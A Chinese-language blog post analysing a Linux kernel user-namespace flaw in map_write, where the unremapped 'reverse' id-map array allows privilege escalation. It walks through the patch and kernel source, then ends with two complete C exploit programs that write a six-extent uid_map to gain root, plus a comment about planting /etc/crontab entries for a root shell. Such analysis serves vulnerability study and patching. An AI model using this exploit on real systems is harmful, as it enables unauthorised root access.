簡介
這是名稱空間的漏洞,文章先介紹user namespaces的簡單只是,然後從補丁入手,分析原始碼,找到漏洞出現的原因。因為對這塊的原始碼不是那麼熟悉,所以著重描述原始碼分析的部分,其他可以參考末尾的連結
namespace
linux中有實現名稱空間,用來隔離不同的資源,實現原理就是將原本是全域性的變數放到各個namespaces之中去。
user namespaces
linux中user namespaces的man說明:overview of Linux user namespaces
user namespaces是linux中用來隔離與安全相關的標誌符和屬性的名稱空間,主要包括UID、GID、根目錄、祕鑰和capacity。在名稱空間中,user namespaces可以實現程式和名稱空間中有不同的uid和gid,比如名稱空間中可以有root許可權而在真實系統中沒有。
在上面的main說明中可以看到兩個proc檔案: /proc/<pid>/uid_map 和 /proc/<pid>/gid_map。向這個檔案寫入值可以用來將系統中的uid或gid對映到namespaces中去。其中:
- 第一個欄位ID-inside-ns表示在容器顯示的UID或GID,
- 第二個欄位ID-outside-ns表示容器外對映的真實的UID或GID。
- 第三個欄位表示對映的範圍,一般填1,表示一一對應。
比如,把真實的uid=1000對映成容器內的uid=0
$
cat
/proc/2465/uid_map
0 1000 1
- 寫這兩個檔案的程式需要這個namespace中的CAP_SETUID (CAP_SETGID)許可權(可參看Capabilities)
- 寫入的程式必須是此user namespace的父或子的user namespace程式。
- 另外需要滿如下條件之一:1)父程式將effective uid/gid對映到子程式的user namespace中,2)父程式如果有CAP_SETUID/CAP_SETGID許可權,那麼它將可以對映到父程式中的任一uid/gid。
補丁分析
這個漏洞的修補在這裡,問題出在kernel/user_namespace.c中的map_write之中:
diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c index e5222b5..923414a 100644 --- a/kernel/user_namespace.c +++ b/kernel/user_namespace.c @@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf, if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; - ret = sort_idmaps(&new_map); - if (ret < 0) - goto out; - ret = -EPERM; /* Map the lower ids from the parent user namespace to the * kernel global id space. @@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf, e->lower_first = lower_first; } + /* + * If we want to use binary search for lookup, this clones the extent + * array and sorts both copies. + */ + ret = sort_idmaps(&new_map); + if (ret < 0) + goto out; + /* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent,
只是調換了幾行程式碼的位置,先不著急,分析一下這個函式。
在understand中,找出這個函式的呼叫流程圖:
然後去看看呼叫map_write的函式proc_uid_map_write,函式原型:
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos)
引數很像檔案描述符的寫操作函式,在尋找原始碼中和該函式相關的操作,發現在fs/proc/base.c之中有這樣一個結構用到了proc_uid_map_write:
static const struct file_operations proc_uid_map_operations = { .open = proc_uid_map_open, .write = proc_uid_map_write, .read = seq_read, .llseek = seq_lseek, .release = proc_id_map_release, };
確認是檔案的操作,接著在這個檔案中,還有下面的程式碼
REG("uid_map", S_IRUGO|S_IWUSR, proc_uid_map_operations)
所以,推測這就是 /proc/<pid>/uid_map檔案寫操作的實現
原始碼分析
接著回到漏洞原始碼,開始分析,先從proc_uid_map_write函式開始,也就是檔案寫操作的第一個函式
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos) { struct seq_file *seq = file->private_data; struct user_namespace *ns = seq->private; struct user_namespace *seq_ns = seq_user_ns(seq); if (!ns->parent) return -EPERM; if ((seq_ns != ns) && (seq_ns != ns->parent)) return -EPERM; return map_write(file, buf, size, ppos, CAP_SETUID, &ns->uid_map, &ns->parent->uid_map); }
看到只是做了兩個檢查,然後呼叫了map_write函式,而map_write函式的後兩個引數分別為名稱空間的uid_map和父名稱空間的uid_map(由名稱空間的知識可以知道,名稱空間的新建是需要clone處新程式,傳入特定引數來建立新的名稱空間)
看看這些個map的定義,看到uid_gid_extent的定義正好是符合 /proc/<pid>/uid_map等的檔案格式,而且在user_naspace的man手冊中寫道,這些檔案一次能寫入多個值,在Linux中4.14之前,這個極限被(任意地)設為5行。從Linux 4.15,限制是340行。這樣下面這兩個結構就不難理解了,當資料行數在5之內的時候,直接寫在extent裡面,當大於5的時候,放在forward指向的位置:
#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340
struct uid_gid_extent { u32 first; u32 lower_first; u32 count; }; struct uid_gid_map { /* 64 bytes -- 1 cache line */ u32 nr_extents; union { struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS]; struct { struct uid_gid_extent *forward; struct uid_gid_extent *reverse; }; }; };
看map_write的原始碼的第一部分,比較好理解了,capacity相關的含義對照man手冊中的解釋,除去幾個引數判斷的位置,比較重要的就是kbuf這塊記憶體,呼叫了memdup_user_nul函式先在核心中分配了一塊記憶體,然後將使用者態寫入的資料複製到核心之中,最後這塊記憶體由kbuf指向
struct seq_file *seq = file->private_data; struct user_namespace *ns = seq->private; struct uid_gid_map new_map; unsigned idx; struct uid_gid_extent extent; char *kbuf = NULL, *pos, *next_line; ssize_t ret = -EINVAL; memset(&new_map, 0, sizeof(struct uid_gid_map)); ret = -EPERM; /* Only allow one successful write to the map */ if (map->nr_extents != 0) goto out; /* * Adjusting namespace settings requires capabilities on the target. */ if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN)) goto out; /* Only allow < page size writes at the beginning of the file */ ret = -EINVAL; if ((*ppos != 0) || (count >= PAGE_SIZE)) goto out; /* Slurp in the user data */ //從使用者空間複製寫入的資料到kbuf kbuf = memdup_user_nul(buf, count); if (IS_ERR(kbuf)) { ret = PTR_ERR(kbuf); kbuf = NULL; goto out; } /* Parse the user data */ ret = -EINVAL; pos = kbuf;
接著看,有一個大迴圈,不斷的按行解析出使用者輸入資料,存放進extent中,然後呼叫了兩個比較關鍵的函式,mappings_overlap和insert_extent,mappings_overlap用來檢測uid_gid_extent和uid_gid_map有沒有重疊的部分,有返回true,insert_extent用來向uid_gid_map中插入一個uid_gid_extent。
for (; pos; pos = next_line) { /* Find the end of line and ensure I don't look past it */ next_line = strchr(pos, '\n'); if (next_line) { *next_line = '\0'; next_line++; if (*next_line == '\0') next_line = NULL; } pos = skip_spaces(pos); extent.first = simple_strtoul(pos, &pos, 10); if (!isspace(*pos)) goto out; pos = skip_spaces(pos); extent.lower_first = simple_strtoul(pos, &pos, 10); if (!isspace(*pos)) goto out; pos = skip_spaces(pos); extent.count = simple_strtoul(pos, &pos, 10); if (*pos && !isspace(*pos)) goto out; /* Verify there is not trailing junk on the line */ pos = skip_spaces(pos); if (*pos != '\0') goto out; /* Verify we have been given valid starting values */ if ((extent.first == (u32) -1) || (extent.lower_first == (u32) -1)) goto out; /* Verify count is not zero and does not cause the * extent to wrap */ if ((extent.first + extent.count) <= extent.first) goto out; if ((extent.lower_first + extent.count) <= extent.lower_first) goto out; /* Do the ranges in extent overlap any previous extents? */ if (mappings_overlap(&new_map, &extent)) goto out; if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS && (next_line != NULL)) goto out; ret = insert_extent(&new_map, &extent); if (ret < 0) goto out; ret = -EINVAL; }
看看這上面說到的兩個關鍵函式的實現,mappings_overlap函式中,遍歷uid_gid_map,取出每個uid_gid_extent,然後和extent進行比較,包括區間的上界和下屆,同時可以看到當nr_extent大於5的時候,會指向forword指向的uid_gid_extent
static bool mappings_overlap(struct uid_gid_map *new_map, struct uid_gid_extent *extent) { u32 upper_first, lower_first, upper_last, lower_last; unsigned idx; upper_first = extent->first; lower_first = extent->lower_first; upper_last = upper_first + extent->count - 1; lower_last = lower_first + extent->count - 1; for (idx = 0; idx < new_map->nr_extents; idx++) { u32 prev_upper_first, prev_lower_first; u32 prev_upper_last, prev_lower_last; struct uid_gid_extent *prev; if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) prev = &new_map->extent[idx]; else prev = &new_map->forward[idx]; prev_upper_first = prev->first; prev_lower_first = prev->lower_first; prev_upper_last = prev_upper_first + prev->count - 1; prev_lower_last = prev_lower_first + prev->count - 1; /* Does the upper range intersect a previous extent? */ if ((prev_upper_first <= upper_last) && (prev_upper_last >= upper_first)) return true; /* Does the lower range intersect a previous extent? */ if ((prev_lower_first <= lower_last) && (prev_lower_last >= lower_first)) return true; } return false; }
好了,接著看insert_extent函式,可以看出一個大的if條件,當插入操作進行到末尾的時候,會分配一塊340的記憶體,然後將拷貝的目的地址設定為forward指向的位置,接著nr_extent增加
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent) { struct uid_gid_extent *dest; if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) { struct uid_gid_extent *forward; /* Allocate memory for 340 mappings. */ forward = kmalloc(sizeof(struct uid_gid_extent) * UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL); if (!forward) return -ENOMEM; /* Copy over memory. Only set up memory for the forward pointer. * Defer the memory setup for the reverse pointer. */ memcpy(forward, map->extent, map->nr_extents * sizeof(map->extent[0])); map->forward = forward; map->reverse = NULL; } if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS) dest = &map->extent[map->nr_extents]; else dest = &map->forward[map->nr_extents]; *dest = *extent; map->nr_extents++; return 0; }
下面回到map_write函式,之前的操作都是用來複制輸入資料,做一些檢查工作,最終的輸入資料被放在了new_map中,new_idmap_permitted就不看了,可以對照usernamespaces的capacity來進行理解,接下來的函式是sort_idmaps函式
if (new_map.nr_extents == 0) goto out; ret = -EPERM; /* Validate the user is allowed to use user id's mapped to. */ if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; ret = sort_idmaps(&new_map); if (ret < 0) goto out;
sort_idmaps函式,這是一個排序函式,並且只有當只排序大於5的部分,同時kmemdup函式還複製了一份,進行了你想排序,將結果放在reverse處,從上面的函式能考到這個值被初始化為NULL
static int sort_idmaps(struct uid_gid_map *map) { if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) return 0; /* Sort forward array. */ sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent), cmp_extents_forward, NULL); /* Only copy the memory from forward we actually need. */ map->reverse = kmemdup(map->forward, map->nr_extents * sizeof(struct uid_gid_extent), GFP_KERNEL); if (!map->reverse) return -ENOMEM; /* Sort reverse array. */ sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent), cmp_extents_reverse, NULL); return 0; }
然後從map_write函式,遍歷了輸入資料,呼叫了map_id_range_down函式,這個函式的引數1是map_write接受的參數列示父名稱空間的uid_gid_map,引數23表示寫入資料的第23項,也就是對映父名稱空間的其實位置和範圍
/* Map the lower ids from the parent user namespace to the * kernel global id space. */ for (idx = 0; idx < new_map.nr_extents; idx++) { struct uid_gid_extent *e; u32 lower_first; if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) e = &new_map.extent[idx]; else e = &new_map.forward[idx]; lower_first = map_id_range_down(parent_map, e->lower_first, e->count); /* Fail if we can not map the specified extent to * the kernel global id space. */ if (lower_first == (u32) -1) goto out; e->lower_first = lower_first; }
好,接著看map_id_range_down
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count) { struct uid_gid_extent *extent; unsigned extents = map->nr_extents; smp_rmb(); if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS) extent = map_id_range_down_base(extents, map, id, count); else extent = map_id_range_down_max(extents, map, id, count); /* Map the id or note failure */ if (extent) id = (id - extent->first) + extent->lower_first; else id = (u32) -1; return id; }
直接呼叫的map_id_range_down_max,是一個二分搜尋的封裝,回顧使用者輸入資料,第2個參數列示要對映的父名稱空間的起始位置,這個函式使用二分搜尋,在父名稱空間中找一個uid_gid_extent,而這個uid_gid_extent的[first,first+count-1]包含了子名稱空間想對映的區間。
/** * map_id_range_down_max - Find idmap via binary search in ordered idmap array. * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS. */ static struct uid_gid_extent * map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count) { struct idmap_key key; key.map_up = false; key.count = count; key.id = id; return bsearch(&key, map->forward, extents, sizeof(struct uid_gid_extent), cmp_map_id); }
回到map_id_range_down函式,取得這個uid_gid_extent之後,利用這個uid_gid_extent區更新了id並且返回,向前看,可以知道這個id是子名稱空間中uid_gid_extent的lower_first欄位,也就是想對映的父名稱空間的起始位置。下面這句話將id的值更新位父名稱空間的父名稱空間的位置,由於所有的名稱空間都是由一個根名稱空間,一步一步巢狀下來,所以這和值最終代表的是整個系統中的uid值。
id = (id - extent->first) + extent->lower_first;
最後,回到map_write函式中,for迴圈的最後利用下面的語句更新了new_map中對應uid_gid_extent的lower_first欄位
e->lower_first = lower_first;
map_write還剩下最後一部分,這部分就類似於寫回,map_write傳入了一個引數為map,從proc_uid_map_write函式可以知道這是當前名稱空間的uid_gid_map,new_map是新建的,這部分的工作就是將new_map寫回到map中(這個proc檔案只能被寫入一次,並且初始的時候是空的)。最後做了一些錯誤處理。
/* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent, new_map.nr_extents * sizeof(new_map.extent[0])); } else { map->forward = new_map.forward; map->reverse = new_map.reverse; } smp_wmb(); map->nr_extents = new_map.nr_extents; *ppos = count; ret = count; out: if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) { kfree(new_map.forward); kfree(new_map.reverse); map->forward = NULL; map->reverse = NULL; map->nr_extents = 0; } mutex_unlock(&userns_state_mutex); kfree(kbuf); return ret;
漏洞分析
前面的sort_idmaps函式中,可以看到當資料數目大於5的時候,還建立了一個reverse的副本,然後進行了排序,然後就沒有更改過了,最後將這個記憶體地址賦值給了map。
來看看兩個排序方式的區別
static int cmp_extents_forward(const void *a, const void *b) { const struct uid_gid_extent *e1 = a; const struct uid_gid_extent *e2 = b; if (e1->first < e2->first) return -1; if (e1->first > e2->first) return 1; return 0; } /* cmp function to sort() reverse mappings */ static int cmp_extents_reverse(const void *a, const void *b) { const struct uid_gid_extent *e1 = a; const struct uid_gid_extent *e2 = b; if (e1->lower_first < e2->lower_first) return -1; if (e1->lower_first > e2->lower_first) return 1; return 0; }
forward是用uid_gid_map中uid_gid_extent的first欄位來進行排序,而reverse是利用lower_first欄位進行排序
在前面呼叫map_id_range_down的for迴圈中,更新了e->lower_first的值,而e是通過forward來找到的,所以說最終只是更新了forward中的值,而reverse中的值沒有被更改,所以說這個reverse中的值是使用者傳進來的,如果先有一個名稱空間n1,對映自己的root程式到kernel的普通程式,然後n1再建立一個名稱空間n2,而將n1的root許可權對映到n2的root許可權,這樣在n2中的uid_map中,forword指向的uid_gid_extent的第2項被更改了,但是forword指向的沒有被更改,還保持root到root的對映,所以通過這個reverse來判斷的uid就會出現許可權提升了。
然後就是這個reverse的連結串列到底在哪裡被用到,並且是用來幹嘛的?
根據作者的介紹,在user_namespaces中對reverse這個變數的引用,可以知道直接利用的函式在from_kuid()中,被kuid_has_mapping()判斷是否被對映,後者接著又被類似於inode_owner_or_capable()
和 privileged_wrt_inode_uidgid()
這樣的許可權檢查函式所使用。利用程式碼
最後附上漏洞利用的程式碼,第一部分是subuid_shell.c,這是一個普通的unshare函式來建立一個新的名空間,主要流程如下:
1、父程式fork子程式,之後子程式等待,父程式呼叫unshare建立一個新的名稱空間
2、父程式建立新的名稱空間後等待,子程式寫入uid_map等檔案,設立對映條件
3、子程式等待,父程式呼叫sh
#define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <grp.h> #include <sched.h> #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <sys/prctl.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <unistd.h> int main(void) { int sync_pipe[2]; char dummy; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe"); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { // kill child if parent dies prctl(PR_SET_PDEATHSIG, SIGKILL); close(sync_pipe[1]); // create new ns if (unshare(CLONE_NEWUSER)) err(1, "unshare userns"); if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock"); if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock"); // set uid and gid to 0, in child ns if (setgid(0)) err(1, "setgid"); if (setuid(0)) err(1, "setuid"); // replace process with bash shell, in which you will see "root", // as the setuid(0) call worked // this might seem a little confusing, but you are "root" only to this child ns, // thus, no permission to the outside ns execl("/bin/bash", "bash", NULL); err(1, "exec"); } close(sync_pipe[0]); if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock"); // set id mapping (0..1000) for child process char cmd[1000]; sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child); if (system(cmd)) errx(1, "denying setgroups failed"); sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child); if (system(cmd)) errx(1, "newuidmap failed"); sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child); if (system(cmd)) errx(1, "newgidmap failed"); if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock"); int status; if (wait(&status) != child) err(1, "wait"); return 0; }
然後是subshell.c函式,主要流程同上,只是子程式寫入對映的資料不同,為什麼是這些資料可以參考前面的漏洞分析部分
#define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <grp.h> #include <sched.h> #include <stdio.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <unistd.h> int main(void) { int sync_pipe[2]; char dummy; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe"); // create a child process pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { // in child process close(sync_pipe[1]); // this creates a new ns if (unshare(CLONE_NEWUSER)) err(1, "unshare userns"); if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock"); if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock"); // start a bash process (replace process image) // this time you are actually root, without the name/id, though // technically the root access is not complete, // to get complete root, write to /etc/crontab and wait for a root shell to pop up execl("/bin/bash", "bash", NULL); err(1, "exec"); } close(sync_pipe[0]); if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock"); char pbuf[100]; // path of uid_map sprintf(pbuf, "/proc/%d", (int)child); // cd to /proc/pid/uid_map if (chdir(pbuf)) err(1, "chdir"); // our new id mapping with 6 extents (> 5 extents) const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n"; // write the new mapping to uid_map and gid_map int uid_map = open("uid_map", O_WRONLY); if (uid_map == -1) err(1, "open uid map"); if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map"); close(uid_map); int gid_map = open("gid_map", O_WRONLY); if (gid_map == -1) err(1, "open gid map"); if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map"); close(gid_map); if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock"); int status; if (wait(&status) != child) err(1, "wait"); return 0; }